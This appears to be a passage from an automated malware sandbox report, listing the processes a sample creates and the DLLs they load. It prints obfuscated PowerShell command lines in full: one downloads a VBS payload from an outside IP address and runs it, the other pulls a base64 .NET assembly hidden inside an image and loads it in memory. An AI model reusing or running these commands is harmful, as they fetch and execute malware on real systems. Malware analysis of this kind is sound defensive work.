ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJFNhdVU2OjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTkyLjMuMjcuMTQ0LzI1MC9zd2VldG5lc3Nnb29kZm9yZ3JlYXRuZXNzdGhpbmdzd2l0aGdvb2QudElGIiwiJEVOVjpBUFBEQVRBXHN3ZWV0bmVzc2dvb2Rmb3JncmVhdG5lc3N0aGluZ3N3aXRoLnZiUyIsMCwwKTtTVGFyVC1TTGVlUCgzKTtpTnZvS0UtZXhwcmVzU2lvTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJEVOVjpBUFBEQVRBXHN3ZWV0bmVzc2dvb2Rmb3JncmVhdG5lc3N0aGluZ3N3aXRoLnZiUyI='+[cHaR]34+'))')))"Jump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powERshEll -EX bYPAss -noP -W 1 -C DevIcEcredeNtIaldEPlOymEnt ; inVOKe-eXPRESSIOn($(invOke-expREsSiOn('[sYSTEm.TExT.ENcODINg]'+[CHAr]0x3a+[char]58+'UtF8.geTsTRinG([systeM.CoNVErT]'+[cHaR]58+[chAR]58+'FROMBaSe64STring('+[ChAr]0x22+'JFNhdVU2ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYWRELXR5UEUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1lTUJlUkRFRmluaXRpb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVybG1PTi5kTGwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHVxeEF1LHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBnSFdna21OLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBtdFpJWXFYSUJoLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUSxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAganRSbCk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbkFtRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAieCIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hbWVzcEFDZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBOc0RIanhBICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJFNhdVU2OjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTkyLjMuMjcuMTQ0LzI1MC9zd2VldG5lc3Nnb29kZm9yZ3JlYXRuZXNzdGhpbmdzd2l0aGdvb2QudElGIiwiJEVOVjpBUFBEQVRBXHN3ZWV0bmVzc2dvb2Rmb3JncmVhdG5lc3N0aGluZ3N3aXRoLnZiUyIsMCwwKTtTVGFyVC1TTGVlUCgzKTtpTnZvS0UtZXhwcmVzU2lvTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJEVOVjpBUFBEQVRBXHN3ZWV0bmVzc2dvb2Rmb3JncmVhdG5lc3N0aGluZ3N3aXRoLnZiUyI='+[cHaR]34+'))')))"Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\thj2bm0i\thj2bm0i.cmdline"Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\sweetnessgoodforgreatnessthingswith.vbS" Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES2316.tmp" "c:\Users\user\AppData\Local\Temp\thj2bm0i\CSCE4BAB64F6B1C4E5BA339BD9879E79427.TMP"Jump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };$originalText = '#x#.rofdoogemneve/052/441.72.3.291//:p##h';$restoredText = $originalText -replace '#', 't';$vicegerents = 'https://res.cloudinary.com/dnkr4s5yg/image/upload/v1735420882/givvuo2katk3jnggipgn.jpg ';$unroyalist = New-Object System.Net.WebClient;$googleability = $unroyalist.DownloadData($vicegerents);$tuillette = [System.Text.Encoding]::UTF8.GetString($googleability);$marischal = '<<BASE64_START>>';$botchedly = '<<BASE64_END>>';$uscher = $tuillette.IndexOf($marischal);$diffamed = $tuillette.IndexOf($botchedly);$uscher -ge 0 -and $diffamed -gt $uscher;$uscher += $marischal.Length;$tetri = $diffamed - $uscher;$engagement = $tuillette.Substring($uscher, $tetri);$admixture = -join ($engagement.ToCharArray() | ForEach-Object { $_ })[-1..-($engagement.Length)];$satisfy = [System.Convert]::FromBase64String($admixture);$rivets = [System.Reflection.Assembly]::Load($satisfy);$subtractions = [dnlib.IO.Home].GetMethod('VAI');$subtractions.Invoke($null, @($restoredText, 'chlorinations', 'chlorinations', 'chlorinations', 'aspnet_compiler', 'chlorinations', 'chlorinations','chlorinations','chlorinations','chlorinations','chlorinations','chlorinations','1','chlorinations','TaskName'));if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };"Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"Jump to behavior
                Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exeJump to behavior
                Source: C:\Windows\explorer.exeProcess created: C:\Windows\explorer.exe C:\Windows\explorer.exeJump to behavior
                Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exeJump to behavior
                Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exeJump to behavior
                Source: C:\Windows\explorer.exeProcess created: C:\Windows\explorer.exe C:\Windows\explorer.exeJump to behavior
                Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exeJump to behavior
                Source: C:\Windows\explorer.exeProcess created: C:\Windows\explorer.exe C:\Windows\explorer.exeJump to behavior
                Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exeJump to behavior
                Source: C:\Windows\explorer.exeProcess created: C:\Windows\explorer.exe C:\Windows\explorer.exeJump to behavior
                Source: C:\Windows\SysWOW64\mshta.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\SysWOW64\mshta.exeSection loaded: mshtml.dllJump to behavior
                Source: C:\Windows\SysWOW64\mshta.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\SysWOW64\mshta.exeSection loaded: powrprof.dllJump to behavior
                Source: C:\Windows\SysWOW64\mshta.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wkscli.dllJump to behavior
                Source: C:\Windows\SysWOW64\mshta.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Windows\SysWOW64\mshta.exeSection loaded: umpdc.dllJump to behavior
                Source: C:\Windows\SysWOW64\mshta.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Windows\SysWOW64\mshta.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Windows\SysWOW64\mshta.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Windows\SysWOW64\mshta.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\SysWOW64\mshta.exeSection loaded: msiso.dllJump to behavior
                Source: C:\Windows\SysWOW64\mshta.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\SysWOW64\mshta.exeSection loaded: srpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\mshta.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\SysWOW64\mshta.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Windows\SysWOW64\mshta.exeSection loaded: msimtf.dllJump to behavior
                Source: C:\Windows\SysWOW64\mshta.exeSection loaded: dxgi.dllJump to behavior
                Source: C:\Windows\SysWOW64\mshta.exeSection loaded: textinputframework.dllJump to behavior
                Source: C:\Windows\SysWOW64\mshta.exeSection loaded: coreuicomponents.dllJump to behavior
                Source: C:\Windows\SysWOW64\mshta.exeSection loaded: coremessaging.dllJump to behavior
                Source: C:\Windows\SysWOW64\mshta.exeSection loaded: ntmarta.dllJump to behavior
                Source: C:\Windows\SysWOW64\mshta.exeSection loaded: coremessaging.dllJump to behavior
                Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Windows\SysWOW64\mshta.exeSection loaded: resourcepolicyclient.dllJump to behavior
                Source: C:\Windows\SysWOW64\mshta.exeSection loaded: jscript9.dllJump to behavior
                Source: C:\Windows\SysWOW64\mshta.exeSection loaded: vbscript.dllJump to behavior
                Source: C:\Windows\SysWOW64\mshta.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Windows\SysWOW64\mshta.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\SysWOW64\mshta.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\mshta.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\SysWOW64\mshta.exeSection loaded: mpr.dllJump to behavior
                Source: C:\Windows\SysWOW64\mshta.exeSection loaded: scrrun.dllJump to behavior
                Source: C:\Windows\SysWOW64\mshta.exeSection loaded: sxs.dllJump to behavior
                Source: C:\Windows\SysWOW64\mshta.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Windows\SysWOW64\mshta.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\mshta.exeSection loaded: msls31.dllJump to behavior
                Source: C:\Windows\SysWOW64\mshta.exeSection loaded: d2d1.dllJump to behavior
                Source: C:\Windows\SysWOW64\mshta.exeSection loaded: edputil.dllJump to behavior
                Source: C:\Windows\SysWOW64\mshta.exeSection loaded: dwrite.dllJump to behavior
                Source: C:\Windows\SysWOW64\mshta.exeSection loaded: d3d11.dllJump to behavior
                Source: C:\Windows\SysWOW64\mshta.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                Source: C:\Windows\SysWOW64\mshta.exeSection loaded: d3d10warp.dllJump to behavior
                Source: C:\Windows\SysWOW64\mshta.exeSection loaded: appresolver.dllJump to behavior
                Source: C:\Windows\SysWOW64\mshta.exeSection loaded: bcp47langs.dllJump to behavior
                Source: C:\Windows\SysWOW64\mshta.exeSection loaded: slc.dllJump to behavior
                Source: C:\Windows\SysWOW64\mshta.exeSection loaded: sppc.dllJump to behavior
                Source: C:\Windows\SysWOW64\mshta.exeSection loaded: dxcore.dllJump to behavior
                Source: C:\Windows\SysWOW64\mshta.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                Source: C:\Windows\SysWOW64\mshta.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                Source: C:\Windows\SysWOW64\mshta.exeSection loaded: dataexchange.dllJump to behavior
                Source: C:\Windows\SysWOW64\mshta.exeSection loaded: dcomp.dllJump to behavior
                Source: C:\Windows\SysWOW64\mshta.exeSection loaded: twinapi.appcore.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kdscli.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntmarta.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sxs.dllJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: vbscript.dllJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: msisip.dllJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wshext.dllJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: scrobj.dllJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: mpr.dllJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: scrrun.dllJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: edputil.dllJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: appresolver.dllJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: bcp47langs.dllJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: slc.dllJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sppc.dllJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: taskschd.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: webio.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: mfsrcsnk.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\icgfugfSection loaded: mscoree.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\icgfugfSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\icgfugfSection loaded: version.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\icgfugfSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\icgfugfSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\icgfugfSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\SysWOW64\explorer.exeSection loaded: aepic.dll
                Source: C:\Windows\SysWOW64\explorer.exeSection loaded: twinapi.dll
                Source: C:\Windows\SysWOW64\explorer.exeSection loaded: userenv.dll
                Source: C:\Windows\SysWOW64\explorer.exeSection loaded: iphlpapi.dll
                Source: C:\Windows\SysWOW64\explorer.exeSection loaded: powrprof.dll
                Source: C:\Windows\SysWOW64\explorer.exeSection loaded: windows.storage.dll
                Source: C:\Windows\SysWOW64\explorer.exeSection loaded: dxgi.dll
                Source: C:\Windows\SysWOW64\explorer.exeSection loaded: windows.storage.dll
                Source: C:\Windows\SysWOW64\explorer.exeSection loaded: kernel.appcore.dll
                Source: C:\Windows\SysWOW64\explorer.exeSection loaded: propsys.dll
                Source: C:\Windows\SysWOW64\explorer.exeSection loaded: coremessaging.dll
                Source: C:\Windows\SysWOW64\explorer.exeSection loaded: urlmon.dll
                Source: C:\Windows\SysWOW64\explorer.exeSection loaded: windows.storage.dll
                Source: C:\Windows\SysWOW64\explorer.exeSection loaded: windows.storage.dll
                Source: C:\Windows\SysWOW64\explorer.exeSection loaded: kernel.appcore.dll
